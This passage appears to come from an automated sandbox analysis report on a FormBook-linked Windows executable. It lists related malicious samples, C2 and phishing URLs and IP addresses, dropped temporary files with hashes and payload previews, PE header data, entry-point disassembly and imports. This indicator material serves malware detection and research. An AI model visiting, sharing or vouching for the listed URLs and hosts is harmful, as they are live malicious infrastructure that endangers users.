            • www.johnasian.com/jn17/?AjFxkn=AUopA6EtHNKAXsGcnergFbbGiEMiDoIvdiVznSugjPZqqO5N3A9xjJjKmrW26oeiLAOH&Yxl0T=CPqtRfop
            UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
            • www.id91920.com/fs83/?K6kd=8lIozjCqSLfPDorgIcX1ftJlpRSaTueiBgmxgg5HldscziyRpsyXpMHH8F7QpJEOuhLDcFmkzQ==&uTrL=_bj8lfEpU
            240330_unpackedGet hashmaliciousUnknownBrowse
            • pimphattana.com/
            52.25.92.00yt33vmRtD.exeGet hashmaliciousFormBook NeshtaBrowse
            • www.rnerfrfw5z3ki.net/b6a4/?n4kHS=A454S8wp36rH&2dL8=855Z9vQ7KQBH7oBfYdONeB9yi8X3cSgRKy0xE8QF2gCXapWwl6B6GqyWE2Zu86OSM4IC
            tgamf4XuLa.exeGet hashmaliciousFormBookBrowse
            • www.cherrybunk.life/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz
            MPTsTltrWeIcZA6.exeGet hashmaliciousFormBookBrowse
            • www.cramp99039.com/p90g/?z8Ot4=BQK+uzRXfeoKHAmncS2k8OhUXVZO9n/JmDrsHgUuptWL9V6x8DaM5zkP6DGZ1NXNs3fF&oVwPK=EpHT8DAPUNoD_h

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            natroredirect.natrocdn.com6ddrUd6iQo.exeGet hashmaliciousFormBookBrowse
            • 85.159.66.93
            Enquiry24-789.exeGet hashmaliciousFormBookBrowse
            • 85.159.66.93
            SOA.exeGet hashmaliciousFormBookBrowse
            • 85.159.66.93
            draft Proforma Invoice.exeGet hashmaliciousFormBookBrowse
            • 85.159.66.93
            Purchase Order 2.exeGet hashmaliciousFormBookBrowse
            • 85.159.66.93
            A.W.B.exeGet hashmaliciousFormBookBrowse
            • 85.159.66.93
            TT Application copy.exeGet hashmaliciousFormBookBrowse
            • 85.159.66.93
            PO 1024.exeGet hashmaliciousFormBookBrowse
            • 85.159.66.93
            SecuriteInfo.com.Win32.PWSX-gen.18110.20008.exeGet hashmaliciousFormBookBrowse
            • 85.159.66.93
            nK1Y86mbzfbkwpB.exeGet hashmaliciousFormBook, PureLog StealerBrowse
            • 85.159.66.93
            www.kasegitai.tokyoDocument TOP19928.exeGet hashmaliciousFormBookBrowse
            • 202.172.28.202
            wOoESPII08.exeGet hashmaliciousFormBookBrowse
            • 202.172.28.202
            opp46lGmxd.exeGet hashmaliciousFormBookBrowse
            • 202.172.28.202
            mzrHGroQZy.htaGet hashmaliciousFormBookBrowse
            • 202.172.28.202
            j5Gx6UXYOm.exeGet hashmaliciousFormBookBrowse
            • 202.172.28.202
            5fG4r07BPy.exeGet hashmaliciousFormBookBrowse
            • 202.172.28.202
            eGHWPCyhLI.exeGet hashmaliciousFormBookBrowse
            • 202.172.28.202
            Z1glGeDwjL.exeGet hashmaliciousFormBookBrowse
            • 202.172.28.202
            9KBARIRa8X.exeGet hashmaliciousFormBookBrowse
            • 202.172.28.202
            N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
            • 202.172.28.202

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            TANDEMUShttps://www.globalepic.co.kr/view.php?ud=202408011057515744edd3030223_29Get hashmaliciousUnknownBrowse
            • 15.197.193.217
            http://telstra-103141.weeblysite.com/Get hashmaliciousUnknownBrowse
            • 15.197.193.217
            http://telstra-107250.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
            • 15.197.193.217
            http://telstra-108674.weeblysite.com/Get hashmaliciousUnknownBrowse
            • 15.197.193.217
            http://att-yahoo-103994.weeblysite.com/Get hashmaliciousUnknownBrowse
            • 15.197.193.217
            http://home-101446.weeblysite.com/Get hashmaliciousUnknownBrowse
            • 15.197.193.217
            http://telstra-104348.weeblysite.com/Get hashmaliciousUnknownBrowse
            • 15.197.193.217
            b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
            • 15.197.130.221
            https://worker-muddy-mud-21e4.jm-database.workers.dev/account/create?.intl=us&.lang=en-us&srGet hashmaliciousHTMLPhisherBrowse
            • 15.197.193.217
            http://onlineloginportal.comGet hashmaliciousUnknownBrowse
            • 15.197.193.217
            AMAZON-02USUw0VH7yLVB.elfGet hashmaliciousMiraiBrowse
            • 13.49.131.155
            https://kplparis.freshdesk.com/en/support/solutions/articles/154000170570-facture-n-%C2%BA-fc-2024-013Get hashmaliciousUnknownBrowse
            • 52.216.219.8
            rOhEtfiB9i.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
            • 54.94.188.187
            Comprovativo_Julho_sa_12-07-2024_38.vbsGet hashmaliciousUnknownBrowse
            • 52.219.232.162
            pxkt5csAI0.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
            • 54.171.230.55
            3AV1PyEQ16.elfGet hashmaliciousUnknownBrowse
            • 44.241.220.36
            XtkUbewN09.elfGet hashmaliciousMirai, MoobotBrowse
            • 52.29.59.141
            https://markeertrafficservicebv6t3etwyghdsbn.dorik.io/Get hashmaliciousUnknownBrowse
            • 3.131.225.83
            https://forms.office.com/e/0Z5hR0x9HMGet hashmaliciousUnknownBrowse
            • 108.138.26.11
            https://workdrive.zohopublic.eu/file/1n0t05e999a7f921c44b69aef1f2423b63f55Get hashmaliciousUnknownBrowse
            • 18.245.31.24
            SEDO-ASDE#U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            Wquyc7Qwqh.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            http://boovefunding.todayGet hashmaliciousUnknownBrowse
            • 91.195.240.19
            r777528623004-FedEx-Shipping-Label.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            #U0633#U0641#U0627#U0631#U0634 #U062e#U0631#U06cc#U062f #U062c#U062f#U06cc#U062f.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            #U0646#U0645#U0648#U0646#U0647 #U0647#U0627.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            LisectAVT_2403002A_87.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19
            LisectAVT_2403002B_309.exeGet hashmaliciousBdaejec, FormBookBrowse
            • 91.195.240.19
            LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
            • 91.195.240.19

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Temp\F56GKLK7U4

            Download File
            Process:C:\Windows\SysWOW64\netbtugc.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
            Category:dropped
            Size (bytes):196608
            Entropy (8bit):1.1239949490932863
            Encrypted:false
            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
            MD5:271D5F995996735B01672CF227C81C17
            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Temp\aut1BE0.tmp

            Download File
            Process:C:\Users\user\Desktop\QLLafoDdqv.exe
            File Type:data
            Category:dropped
            Size (bytes):270848
            Entropy (8bit):7.993405556885437
            Encrypted:true
            SSDEEP:6144:8mp6/mWhgpoCnXGEAZQRbnavaBPjaKDb9yKueJW4:8mpgnhgfGlobnavkPjDt
            MD5:3A65F7BF1710AD9A746D1BDF4A8D704A
            SHA1:A861C26090AA755712061A001CCFA90FE7A80B87
            SHA-256:C8B12447F6D3A523E36A52D3C35DDB849011B5076C0CBE690EF3AB28A189A660
            SHA-512:5AE564DB8BAF2078F6A72EF8109291A21DA1CC45CA39E57FE45776AA45031C2F23AFEF006F2E09DE708E4ACB5A0079CDD462DDA9155A08BCF7872DABE3EA574E
            Malicious:false
            Reputation:low
            Preview:..p..PL0T..K....l.0W..jH=...L0TMUABK5I8PL0TMUABK5I8PL0TMUA.K5I6O.>T.\.c.4..q.X=>u10$R;Y=lS5#;.6kW,."9^t$;a..fiU?(Uz@XKfK5I8PL0-L\..+R..0+.i-2.X..0+.N...~+R."...h-2.."V!.0+.TMUABK5Ih.L0.LTA.#..8PL0TMUA.K7H3QG0T]QABK5I8PL0.XUAB[5I8pH0TM.AB[5I8RL0RMUABK5I>PL0TMUABk1I8RL0TMUA@Ku.8P\0T]UABK%I8@L0TMUARK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUAl?P1LPL0.BQAB[5I8@H0T]UABK5I8PL0TMUAbK5)8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I

            C:\Users\user\AppData\Local\Temp\aut1C2F.tmp

            Download File
            Process:C:\Users\user\Desktop\QLLafoDdqv.exe
            File Type:data
            Category:dropped
            Size (bytes):9750
            Entropy (8bit):7.642449326057744
            Encrypted:false
            SSDEEP:192:Z6E+bT+X/8ER7PVz6sNiDrFdZMecXWHLy7DdWtb/ZmuYQX:Z6dwXRhNiHBy7Di7ZnY2
            MD5:85697B3DDA09976C8FD29C7A3C3EE6C7
            SHA1:D474B724CE1DF2C4D258C6B4388BD5B7C748FB9F
            SHA-256:721EE4A1A6F496509654620BFFEE1C82C824CE9CA9EDBC89161915B63E94A8DE
            SHA-512:32EC2912548C332B5602B5DB0B52761B706575185613546056390C0122F2633FE47B405FB448974860200515BB47820553F70F43886A3F36E370DD7D7C71365C
            Malicious:false
            Reputation:low
            Preview:EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3|vi..G.7...8_..qf..i|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...

            C:\Users\user\AppData\Local\Temp\exhilaratingly

            Download File
            Process:C:\Users\user\Desktop\QLLafoDdqv.exe
            File Type:ASCII text, with very long lines (28674), with no line terminators
            Category:dropped
            Size (bytes):28674
            Entropy (8bit):3.5800014050641975
            Encrypted:false
            SSDEEP:768:JxBr6ScFCo3T3iC+vt63YntRUu+nZ+nskm/Wsl2HzpmL5sCWi:Zr6ScFCo3T3i3vt63YntRUu+nZ+nskm9
            MD5:B9B2D0603A8B163CA997D551FB01BAE8
            SHA1:8083CA0BF1CE3E9A477B58A3927CDA2240DA6177
            SHA-256:66EE8EE4109C4CEFA994748F2AC8BB2057E4FED3947216FB33C7A65B014E884E
            SHA-512:F182362C40A0E0672C4C013A9E1D89E3BA033D44FDC25EEA77D2E6E972230A04F1977CA631F6151D6AE0A50012EB1C9010AD3F501F042E108F5B40673291F7CC
            Malicious:false
            Reputation:low
            Preview:3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;

            C:\Users\user\AppData\Local\Temp\maneuverability

            Download File
            Process:C:\Users\user\Desktop\QLLafoDdqv.exe
            File Type:data
            Category:dropped
            Size (bytes):270848
            Entropy (8bit):7.993405556885437
            Encrypted:true
            SSDEEP:6144:8mp6/mWhgpoCnXGEAZQRbnavaBPjaKDb9yKueJW4:8mpgnhgfGlobnavkPjDt
            MD5:3A65F7BF1710AD9A746D1BDF4A8D704A
            SHA1:A861C26090AA755712061A001CCFA90FE7A80B87
            SHA-256:C8B12447F6D3A523E36A52D3C35DDB849011B5076C0CBE690EF3AB28A189A660
            SHA-512:5AE564DB8BAF2078F6A72EF8109291A21DA1CC45CA39E57FE45776AA45031C2F23AFEF006F2E09DE708E4ACB5A0079CDD462DDA9155A08BCF7872DABE3EA574E
            Malicious:false
            Reputation:low
            Preview:..p..PL0T..K....l.0W..jH=...L0TMUABK5I8PL0TMUABK5I8PL0TMUA.K5I6O.>T.\.c.4..q.X=>u10$R;Y=lS5#;.6kW,."9^t$;a..fiU?(Uz@XKfK5I8PL0-L\..+R..0+.i-2.X..0+.N...~+R."...h-2.."V!.0+.TMUABK5Ih.L0.LTA.#..8PL0TMUA.K7H3QG0T]QABK5I8PL0.XUAB[5I8pH0TM.AB[5I8RL0RMUABK5I>PL0TMUABk1I8RL0TMUA@Ku.8P\0T]UABK%I8@L0TMUARK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUAl?P1LPL0.BQAB[5I8@H0T]UABK5I8PL0TMUAbK5)8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I8PL0TMUABK5I

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.112429813049341
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:QLLafoDdqv.exe
            File size:1'229'824 bytes
            MD5:9f295f94dfaf4a72ef4aaa28e15543f5
            SHA1:5708ab5bfabaa81d29709fabdd08aa8ba5891d47
            SHA256:16a3ae414f6303383d089b24318edcedb5891f081108035ee2017c3a61ab0012
            SHA512:fc35c5de062664fe3733558d05e58ff3c5312c6fcee7c8aa7e6a32fb89de8f7b69993aff82aaa3f72fec305e4d7b1d1c70e8cf30cd0bc4b5dd758b3cca5df824
            SSDEEP:24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8aSufeTei97aii:NTvC/MTQYxsWR7aSufeai
            TLSH:4845C00273C1D062FF9B91334F5AF61157BC69260123AA2F13A81DB9BE705B1563E7A3
            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

            File Icon

            Icon Hash:aaf3e3e3938382a0

            Static PE Info

            General

            Entrypoint:0x420577
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
            Time Stamp:0x66A39B3B [Fri Jul 26 12:48:59 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:948cc502fe9226992dce9417f952fce3

            Entrypoint Preview

            Instruction
            call 00007FC2F4E86973h
            jmp 00007FC2F4E8627Fh
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007FC2F4E8645Dh
            mov dword ptr [esi], 0049FDF0h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 0049FDF8h
            mov dword ptr [ecx], 0049FDF0h
            ret
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007FC2F4E8642Ah
            mov dword ptr [esi], 0049FE0Ch
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 0049FE14h
            mov dword ptr [ecx], 0049FE0Ch
            ret
            push ebp
            mov ebp, esp
            push esi
            mov esi, ecx
            lea eax, dword ptr [esi+04h]
            mov dword ptr [esi], 0049FDD0h
            and dword ptr [eax], 00000000h
            and dword ptr [eax+04h], 00000000h
            push eax
            mov eax, dword ptr [ebp+08h]
            add eax, 04h
            push eax
            call 00007FC2F4E8901Dh
            pop ecx
            pop ecx
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 0049FDD0h
            push eax
            call 00007FC2F4E89068h
            pop ecx
            ret
            push ebp
            mov ebp, esp
            push esi
            mov esi, ecx
            lea eax, dword ptr [esi+04h]
            mov dword ptr [esi], 0049FDD0h
            push eax
            call 00007FC2F4E89051h
            test byte ptr [ebp+08h], 00000001h
            pop ecx

            Rich Headers

            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x55864.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x12a0000x7594.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0xd40000x558640x55a00c041339bd03a849e09dc3f88a9a09434False0.922764598540146data7.8846075295122855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x12a0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
            RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
            RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
            RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
            RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
            RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
            RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
            RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
            RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
            RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
            RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
            RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
            RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
            RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
            RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
            RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
            RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
            RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
            RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
            RT_RCDATA0xdc7b80x4cb2adata1.000337414134469
            RT_GROUP_ICON0x1292e40x76dataEnglishGreat Britain0.6610169491525424
            RT_GROUP_ICON0x12935c0x14dataEnglishGreat Britain1.25
            RT_GROUP_ICON0x1293700x14dataEnglishGreat Britain1.15
            RT_GROUP_ICON0x1293840x14dataEnglishGreat Britain1.25
            RT_VERSION0x1293980xdcdataEnglishGreat Britain0.6181818181818182
            RT_MANIFEST0x1294740x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

            Imports

            DLLImport
            WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
            MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
            WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
            PSAPI.DLLGetProcessMemoryInfo
            IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
            USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
            UxTheme.dllIsThemeActive
            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, 